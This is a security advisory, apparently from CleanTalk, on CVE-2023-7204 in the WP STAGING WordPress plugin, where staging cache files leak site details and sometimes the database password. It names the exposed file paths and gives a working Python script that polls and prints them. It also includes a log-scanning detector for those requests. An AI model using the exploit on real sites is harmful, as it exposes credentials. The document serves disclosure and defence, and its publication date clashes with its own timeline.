In a recent examination of the WP-STAGING plugin, a highly critical vulnerability was uncovered that poses an existential threat to the security of WordPress installations. The flaw resides in the directory /wordpress/wp-content/uploads/wp-staging/ and exposes not only intricate details about the site's architecture, configuration, and file structure but, more alarmingly, leaks the database password in certain instances. This revelation marks a significant security breach with far-reaching consequences.
Main info:

| Field | Value |
|---|---|
| CVE | CVE-2023-7204 |
| Plugin | WP STAGING WordPress Backup Plugin – Migration Backup Restore < 3.2.0 |
| Critical | Super High |
| All Time | 2 868 943 |
| Active installations | 80 000+ |
| Publicly Published | January 8, 2023 |
| Last Updated | January 8, 2023 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | Yes |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7204 , https://wpscan.com/vulnerability/65a8cf83-d6cc-4d4c-a482-288a83a69879/ |
| Plugin Security Certification by CleanTalk | |
Timeline

| Date | Event |
|---|---|
| December 18, 2023 | Plugin testing and vulnerability detection in the WP-STAGING have been completed |
| December 18, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| December 25, 2023 | The author fixed the vulnerability and released the plugin update |
| January 8, 2023 | Registered CVE-2023-7204 |
Discovery of the Vulnerability
A severe vulnerability has been discovered in the directory /wordpress/wp-content/uploads/wp-staging/. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data, including (in some cases) the database password. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.
Understanding Sensitive Data Exposure attacks
Sensitive Data Exposure involves the unintentional disclosure of confidential information. In the case of WordPress, this could encompass database credentials, configuration files, or other critical data. Real-world examples of such exposure might include inadvertently revealing database passwords, allowing unauthorized users to access sensitive backend information.
Exploiting the Sensitive Data Exposure Vulnerability
Exploiting this vulnerability involves unauthorized users gaining access to sensitive information, particularly database passwords. Armed with this data, attackers can launch various attacks, including brute force attempts on password hashes, potentially leading to a full compromise of the system.
POC:
1) The plugin can create a staging copy of the site. While an administrator runs this process, an attacker can fetch the temporary .cache files it writes.
2) These files contain a lot of sensitive data (paths, including those of other backups; DB name, DB tables, DB columns, etc.) and, most importantly, the database password, if the user runs the PRO version of the plugin and migrates the site to another database:
- http://your_site/wordpress/wp-content/uploads/wp-staging/clone_options.cache
- http://your_site/wordpress/wp-content/uploads/wp-staging/files_to_copy.cache
EXPLOIT (python3):
```python
import requests
import time
import threading

# The two cache files written to the public uploads directory during a staging run.
urls = [
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/clone_options.cache",
    "http://127.0.0.1/wordpress/wp-content/uploads/wp-staging/files_to_copy.cache",
]

print("The following links are checked:")
for url in urls:
    print(url)


def check_url(url):
    # Poll the URL once per second; the file is only present while an admin runs a staging job.
    while True:
        try:
            response = requests.get(url)
            if response.status_code == 200:
                print(f"File at {url} found! I display the contents...")
                print(response.text)
        except requests.RequestException as e:
            print(f"Error when requesting to {url}: {e}")
        time.sleep(1)


# One polling thread per URL.
for url in urls:
    thread = threading.Thread(target=check_url, args=(url,))
    thread.start()
```
___
The potential risks associated with this vulnerability are severe and multifaceted. In real-world scenarios, attackers could:
- Initiate brute force attacks on leaked database passwords.
- Gain unauthorized access to sensitive configurations.
- Compromise the integrity and confidentiality of the entire WordPress system.
This vulnerability not only jeopardizes the immediate security of the affected WordPress site but could also lead to broader consequences if the compromised data is used maliciously.
Recommendations for Improved Security
- Immediate Patching: Developers should release an urgent patch or update that addresses this specific vulnerability.
- Password Rotation: Database passwords should be promptly rotated to nullify the leaked credentials.
- Monitoring and Logging: Implement robust monitoring and logging mechanisms to detect and respond to suspicious activities.
- Educate and Alert Users: Inform WordPress administrators and users about the urgency of the situation and the need to update the plugin immediately.
- Third-Party Security Audits: Consider third-party security audits to identify and rectify any other potential vulnerabilities in the WordPress setup.
By adopting these measures, WordPress administrators can mitigate the immediate risks and fortify their systems against potential exploitation, ensuring the security and confidentiality of their sensitive data.
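As a concrete instance of the monitoring recommendation above, the following added example (written for this page; it is not part of the advisory, of CleanTalk's products, or of the WP STAGING plugin) scans web-server access logs for requests to the two cache paths named in the PoC. It separates polling that the server refused (404/403) from polling that was actually answered with the file (200), because only the latter means credentials may have left the server. It assumes the Apache/nginx "combined" log format; the log lines are constructed samples, and the IP addresses are documentation ranges.

```python
import re
from collections import defaultdict
from datetime import datetime

# Cache files the advisory identifies as readable from the uploads directory.
SENSITIVE_PATHS = (
    "/wp-content/uploads/wp-staging/clone_options.cache",
    "/wp-content/uploads/wp-staging/files_to_copy.cache",
)

# Apache/nginx "combined" access log format (assumed; adjust the pattern for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample traffic: one host polls both cache files once per second and
# eventually receives them (HTTP 200); another host does ordinary admin traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Dec/2023:10:00:01 +0000] "GET /wordpress/wp-content/uploads/wp-staging/clone_options.cache HTTP/1.1" 404 196 "-" "python-requests/2.31.0"
203.0.113.7 - - [18/Dec/2023:10:00:02 +0000] "GET /wordpress/wp-content/uploads/wp-staging/files_to_copy.cache HTTP/1.1" 404 196 "-" "python-requests/2.31.0"
198.51.100.4 - - [18/Dec/2023:10:00:02 +0000] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Dec/2023:10:00:03 +0000] "GET /wordpress/wp-content/uploads/wp-staging/clone_options.cache HTTP/1.1" 200 8831 "-" "python-requests/2.31.0"
203.0.113.7 - - [18/Dec/2023:10:00:04 +0000] "GET /wordpress/wp-content/uploads/wp-staging/files_to_copy.cache?x=1 HTTP/1.1" 200 40120 "-" "python-requests/2.31.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string before matching
    return rec


def is_sensitive(path):
    """True if the request path ends with one of the known wp-staging cache files."""
    return path.endswith(SENSITIVE_PATHS)


def analyze(log_text, probe_threshold=3):
    """Return (per-IP statistics, alert strings).

    Every request to a cache file counts as a probe; a probe answered with 200 means
    the file was actually served and must be treated as a potential credential leak.
    """
    per_ip = defaultdict(lambda: {"probes": 0, "leaks": [], "first": None, "last": None})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_sensitive(rec["path"]):
            continue
        info = per_ip[rec["ip"]]
        info["probes"] += 1
        info["first"] = rec["ts"] if info["first"] is None else min(info["first"], rec["ts"])
        info["last"] = rec["ts"] if info["last"] is None else max(info["last"], rec["ts"])
        if rec["status"] == 200:
            info["leaks"].append(rec["path"])

    alerts = []
    for ip, info in per_ip.items():
        span = (info["last"] - info["first"]).total_seconds()
        if info["leaks"]:
            alerts.append(
                f"LEAK {ip}: served {sorted(set(info['leaks']))} "
                f"after {info['probes']} requests in {span:.0f}s"
            )
        elif info["probes"] >= probe_threshold:
            alerts.append(f"PROBE {ip}: {info['probes']} cache-file requests in {span:.0f}s, none served")
    return dict(per_ip), alerts


if __name__ == "__main__":
    stats, found = analyze(SAMPLE_LOG)
    for alert in found:
        print(alert)
```

A LEAK alert is the trigger for the password-rotation step in the list above, since the served file may have contained the database credentials; a PROBE alert on a patched site still indicates a scanner that knows about this CVE and is worth blocking at the web server or firewall.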
#WordPressSecurity #SensitiveDataExposure #WebsiteSafety #StayProtected #SuperHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.